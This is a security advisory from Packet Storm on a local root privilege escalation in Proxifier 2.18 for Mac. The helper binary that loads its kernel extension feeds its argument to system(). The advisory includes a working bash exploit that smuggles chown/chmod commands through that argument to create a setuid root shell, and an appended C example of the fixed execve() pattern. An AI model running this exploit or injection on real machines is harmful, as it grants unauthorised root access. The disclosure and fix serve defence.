packetstorm | Mark Wadham | PACKETSTORM:142093
Apr 11, 2017 - 12:00 a.m.

Proxifier 2.18 Privilege Escalation / Code Execution

packetstormsecurity.com

EPSS: 0.001 (Low), percentile 27.0%

`Proxifier 2.18 (also 2.17 and possibly some earlier versions) ships with
a KLoader binary which it installs suid root the first time Proxifier is
run. This binary serves a single purpose, which is to load and unload
Proxifier's kernel extension.

Unfortunately it does this by taking the first parameter passed to it on
the command line without any sanitisation and feeding it straight into
system().

This means not only can you load any arbitrary kext as a non-root user
but you can also get a local root shell.

Although this is a bit of a terrible bug that shouldn't be happening in
2017, Proxifier's developers fixed the issue in record time so that's
something!

Everyone using Proxifier for Mac should update to 2.19 as soon as
possible.

https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html
  
-------------------------------------------------------------------  
  
#!/bin/bash  
  
#####################################################################  
# Local root exploit for vulnerable KLoader binary distributed with #  
# Proxifier for Mac v2.18 #  
#####################################################################  
# by m4rkw #  
#####################################################################  
  
cat > a.c <<EOF
#include <unistd.h>

int main()
{
  setuid(0);
  seteuid(0);

  execl("/bin/bash", "bash", NULL);
  return 0;
}
EOF

gcc -o /tmp/a a.c
rm -f a.c
/Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel /tmp/a ; chmod 4755 /tmp/a'
/tmp/a
  
-------------------------------------------------------------------  
  
  
`
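
The fix pattern for the bug described above, as an added example that is not code from the advisory or from Proxifier: a setuid helper that maps the caller's request to a fixed argv and calls execve() directly, instead of passing argv[1] to system(). The kext path and the load/unload keywords are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Assumed, hypothetical kext location: not taken from Proxifier. */
#define KEXT_PATH "/Library/Extensions/Example.kext"

/* Map the caller's request to a fixed argv.
 * Returns 0 on success, -1 unless the request is exactly "load" or "unload".
 * Nothing supplied by the caller is copied into the command, so there is no
 * string to inject into and no way to name a different kext. */
int build_argv(const char *action, const char *argv_out[3])
{
    if (action == NULL)
        return -1;
    if (strcmp(action, "load") == 0)
        argv_out[0] = "/sbin/kextload";
    else if (strcmp(action, "unload") == 0)
        argv_out[0] = "/sbin/kextunload";
    else
        return -1;
    argv_out[1] = KEXT_PATH;
    argv_out[2] = NULL;
    return 0;
}

int main(int argc, char **argv)
{
    const char *cmd[3];
    /* Fixed environment: the unprivileged caller's variables are dropped. */
    static char *const clean_env[] = {
        "PATH=/usr/bin:/bin:/usr/sbin:/sbin", NULL
    };

    if (argc != 2 || build_argv(argv[1], cmd) != 0) {
        fprintf(stderr, "usage: %s load|unload\n", argv[0]);
        return 2;
    }
    /* execve(): absolute program path, no shell, so ';' has no meaning. */
    execve(cmd[0], (char *const *)cmd, clean_env);
    perror("execve");
    return 1;
}
```
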
